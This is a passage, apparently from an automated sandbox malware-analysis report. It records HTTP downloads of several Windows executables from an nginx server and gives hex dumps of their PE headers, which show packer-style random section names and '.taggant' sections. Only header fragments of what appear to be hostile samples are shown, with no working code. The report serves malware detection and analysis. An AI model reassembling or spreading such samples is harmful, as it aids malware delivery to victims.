00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 79 67 63 69 63 73 6d 00 10 1a 00 00 a0 31 00 00 10 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 79 78 6c 71 73 66 6d 00 10 00 00 00 b0 4b 00 00 04 00 00 00 04 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 08 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:07:28 GMTContent-Type: application/octet-streamContent-Length: 1854464Last-Modified: Thu, 24 Oct 2024 06:55:17 GMTConnection: keep-aliveETag: "6719ef55-1c4c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 30 6a 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6a 00 00 04 00 00 e7 22 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 76 71 7a 6b 75 6b 00 f0 19 00 00 30 50 00 00 ea 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 65 6a 72 67 6c 77 77 00 10 00 00 00 20 6a 00 00 04 00 00 00 26 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 6a 00 00 22 00 00 00 2a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:07:31 GMTContent-Type: application/octet-streamContent-Length: 2822656Last-Modified: Thu, 24 Oct 2024 06:45:04 GMTConnection: keep-aliveETag: "6719ecf0-2b1200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 05 dd 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6a 6a 75 79 77 7a 71 00 c0 2a 00 00 a0 00 00 00 b2 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 75 63 63 61 70 6a 63 00 20 00 00 00 60 2b 00 00 04 00 00 00 ec 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 f0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:08:10 GMTContent-Type: application/octet-streamContent-Length: 2958848Last-Modified: Thu, 24 Oct 2024 06:55:10 GMTConnection: keep-aliveETag: "6719ef4e-2d2600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 a0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 30 00 00 04 00 00 94 44 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 77 6b 73 6c 66 70 6e 78 00 90 2a 00 00 00 06 00 00 8e 2a 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 66 69 6f 72 6a 61 74 00 10 00 00 00 90 30 00 00 06 00 00 00 fe 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 30 00 00 22 00 00 00 04 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:08:20 GMTContent-Type: application/octet-streamContent-Length: 1854464Last-Modified: Thu, 24 Oct 2024 06:55:17 GMTConnection: keep-aliveETag: "6719ef55-1c4c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 30 6a 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6a 00 00 04 00 00 e7 22 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 76 71 7a 6b 75 6b 00 f0 19 00 00 30 50 00 00 ea 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 65 6a 72 67 6c 77 77 00 10 00 00 00 20 6a 00 00 04 00 00 00 26 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 6a 00 00 22 00 00 00 2a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:08:30 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Thu, 24 Oct 2024 06:44:38 GMTConnection: keep-aliveETag: "6719ecd6-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ce ec 19 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 a3 7e 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:08:33 GMTContent-Type: application/octet-streamContent-Length: 1911296Last-Modified: Thu, 24 Oct 2024 06:55:23 GMTConnection: keep-aliveETag: "6719ef5b-1d2a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4b 00 00 04 00 00 a9 00 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c ae 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 79 67 63 69 63 73 6d 00 10 1a 00 00 a0 31 00 00 10 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 79 78 6c 71 73 66 6d 00 10 00 00 00 b0 4b 00 00 04 00 00 00 04 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 08 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:08:37 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 